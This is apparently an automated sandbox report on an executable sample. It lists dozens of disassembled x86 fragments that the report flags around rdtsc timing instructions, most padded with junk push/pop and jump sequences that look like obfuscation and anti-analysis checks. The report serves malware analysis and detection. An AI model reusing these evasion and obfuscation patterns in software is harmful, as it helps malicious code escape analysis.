              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D18F52 second address: D18F75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2CCCA0E2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d pop eax 0x0000000e jc 00007FAC2CCCA0D6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D18F75 second address: D18F7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0C5BF second address: D0C5C9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FAC2CCCA0D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0C5C9 second address: D0C5CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D19821 second address: D1983A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAC2CCCA0DEh 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b push eax 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1998F second address: D19999 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FAC2C5039A6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D19999 second address: D1999D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1999D second address: D199B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAC2C5039B1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D199B7 second address: D199C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FAC2CCCA0D6h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D19B10 second address: D19B16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D19B16 second address: D19B1F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1D2E3 second address: D1D319 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 jmp 00007FAC2C5039B2h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jmp 00007FAC2C5039ADh 0x00000016 mov eax, dword ptr [eax] 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b jnc 00007FAC2C5039A6h 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1D319 second address: D1D31D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1F569 second address: D1F56F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1F56F second address: D1F578 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1F578 second address: D1F58C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAC2C5039ACh 0x00000009 pop esi 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1F58C second address: D1F597 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1F597 second address: D1F59D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1F59D second address: D1F5A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1F5A1 second address: D1F5A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D23A55 second address: D23A5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D23A5B second address: D23A62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D23BAF second address: D23BC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jmp 00007FAC2CCCA0DFh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D23BC9 second address: D23BDA instructions: 0x00000000 rdtsc 0x00000002 je 00007FAC2C5039A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D23BDA second address: D23BDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D23BDE second address: D23BF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAC2C5039AFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D23BF6 second address: D23C13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FAC2CCCA0E6h 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D23DC4 second address: D23DCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D23F1A second address: D23F38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FAC2CCCA0E5h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D23F38 second address: D23F3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2435B second address: D2436A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D27CFF second address: D27D05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D28107 second address: D2810D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2810D second address: D2811A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c pop esi 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2848A second address: D28490 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2898D second address: D28991 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D28991 second address: D289A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2CCCA0E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D28A6F second address: D28A73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D28A73 second address: D28A79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D28A79 second address: D28A83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FAC2C5039A6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D28B6B second address: D28B7B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2CCCA0DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D28B7B second address: D28B85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FAC2C5039A6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D29391 second address: D293F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edi 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007FAC2CCCA0D8h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 0000001Ah 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 movzx edi, dx 0x00000026 mov si, cx 0x00000029 push 00000000h 0x0000002b mov edi, dword ptr [ebp+122D38B2h] 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push eax 0x00000036 call 00007FAC2CCCA0D8h 0x0000003b pop eax 0x0000003c mov dword ptr [esp+04h], eax 0x00000040 add dword ptr [esp+04h], 00000014h 0x00000048 inc eax 0x00000049 push eax 0x0000004a ret 0x0000004b pop eax 0x0000004c ret 0x0000004d mov dword ptr [ebp+1246A2DAh], eax 0x00000053 xchg eax, ebx 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 jnl 00007FAC2CCCA0D6h 0x0000005e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D293F9 second address: D293FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2BD3F second address: D2BD45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2BD45 second address: D2BD54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jng 00007FAC2C5039AAh 0x0000000b push edx 0x0000000c pop edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2C443 second address: D2C448 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2C448 second address: D2C44E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2CFE7 second address: D2CFEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2CD08 second address: D2CD0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2DAF2 second address: D2DAF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2DAF7 second address: D2DAFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2E2C5 second address: D2E2CA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2F023 second address: D2F039 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FAC2C5039A8h 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pop eax 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2F039 second address: D2F03E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2F03E second address: D2F044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2F044 second address: D2F068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 xor esi, dword ptr [ebp+122D2CD8h] 0x0000000e push 00000000h 0x00000010 mov dword ptr [ebp+122D303Ah], eax 0x00000016 push 00000000h 0x00000018 mov edi, ecx 0x0000001a push eax 0x0000001b push ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e jc 00007FAC2CCCA0D6h 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2F068 second address: D2F06C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D322F2 second address: D322F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D322F8 second address: D322FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D32908 second address: D3290C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D338E2 second address: D33906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FAC2C5039ACh 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007FAC2C5039ADh 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D33906 second address: D3390A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D34911 second address: D349BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2C5039B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007FAC2C5039A8h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 mov di, cx 0x00000028 jnl 00007FAC2C5039B9h 0x0000002e push 00000000h 0x00000030 call 00007FAC2C5039B3h 0x00000035 jmp 00007FAC2C5039B1h 0x0000003a pop ebx 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push ebx 0x00000040 call 00007FAC2C5039A8h 0x00000045 pop ebx 0x00000046 mov dword ptr [esp+04h], ebx 0x0000004a add dword ptr [esp+04h], 00000017h 0x00000052 inc ebx 0x00000053 push ebx 0x00000054 ret 0x00000055 pop ebx 0x00000056 ret 0x00000057 je 00007FAC2C5039A8h 0x0000005d mov ebx, edi 0x0000005f mov ebx, esi 0x00000061 xchg eax, esi 0x00000062 pushad 0x00000063 pushad 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D349BA second address: D349D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 jo 00007FAC2CCCA0D6h 0x00000018 pop esi 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D34B97 second address: D34B9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D34B9B second address: D34BA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D34BA9 second address: D34BBF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2C5039B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D36AB9 second address: D36B39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAC2CCCA0E9h 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007FAC2CCCA0D8h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 xor dword ptr [ebp+124618F6h], esi 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push ebp 0x00000032 call 00007FAC2CCCA0D8h 0x00000037 pop ebp 0x00000038 mov dword ptr [esp+04h], ebp 0x0000003c add dword ptr [esp+04h], 00000014h 0x00000044 inc ebp 0x00000045 push ebp 0x00000046 ret 0x00000047 pop ebp 0x00000048 ret 0x00000049 add dword ptr [ebp+122D398Fh], edi 0x0000004f push 00000000h 0x00000051 xor dword ptr [ebp+122D1BC3h], edx 0x00000057 xchg eax, esi 0x00000058 push eax 0x00000059 push edx 0x0000005a push edi 0x0000005b jmp 00007FAC2CCCA0DBh 0x00000060 pop edi 0x00000061 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D36B39 second address: D36B58 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FAC2C5039ACh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007FAC2C5039ACh 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D36B58 second address: D36B62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FAC2CCCA0D6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D36B62 second address: D36B66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D37AF4 second address: D37B1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 jng 00007FAC2CCCA0F5h 0x0000000e pushad 0x0000000f jmp 00007FAC2CCCA0E7h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D36CEA second address: D36CEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D36CEE second address: D36CF4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D36CF4 second address: D36D0B instructions: 0x00000000 rdtsc 0x00000002 jc 00007FAC2C5039A8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f js 00007FAC2C5039ACh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D36D0B second address: D36D0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D36D0F second address: D36D14 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D36D14 second address: D36DB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 xor edi, 2E469582h 0x0000000e push dword ptr fs:[00000000h] 0x00000015 mov bx, cx 0x00000018 mov dword ptr fs:[00000000h], esp 0x0000001f push edx 0x00000020 mov bx, di 0x00000023 pop edi 0x00000024 mov eax, dword ptr [ebp+122D1751h] 0x0000002a push 00000000h 0x0000002c push edx 0x0000002d call 00007FAC2CCCA0D8h 0x00000032 pop edx 0x00000033 mov dword ptr [esp+04h], edx 0x00000037 add dword ptr [esp+04h], 0000001Dh 0x0000003f inc edx 0x00000040 push edx 0x00000041 ret 0x00000042 pop edx 0x00000043 ret 0x00000044 push esi 0x00000045 pop edi 0x00000046 push FFFFFFFFh 0x00000048 push 00000000h 0x0000004a push edx 0x0000004b call 00007FAC2CCCA0D8h 0x00000050 pop edx 0x00000051 mov dword ptr [esp+04h], edx 0x00000055 add dword ptr [esp+04h], 00000015h 0x0000005d inc edx 0x0000005e push edx 0x0000005f ret 0x00000060 pop edx 0x00000061 ret 0x00000062 jnp 00007FAC2CCCA0DBh 0x00000068 push eax 0x00000069 jbe 00007FAC2CCCA10Dh 0x0000006f push eax 0x00000070 push edx 0x00000071 jmp 00007FAC2CCCA0E8h 0x00000076 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D37D1B second address: D37D43 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FAC2C5039A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FAC2C5039B4h 0x00000010 pop eax 0x00000011 popad 0x00000012 push eax 0x00000013 push ebx 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D39A53 second address: D39A58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D39A58 second address: D39A5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3BCD5 second address: D3BCD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3CC13 second address: D3CC19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D41069 second address: D4106F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3CC19 second address: D3CC27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3CC27 second address: D3CC2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3CC2E second address: D3CC34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3ED9E second address: D3EDA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FAC2CCCA0D6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D412C2 second address: D412CC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FAC2C5039A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
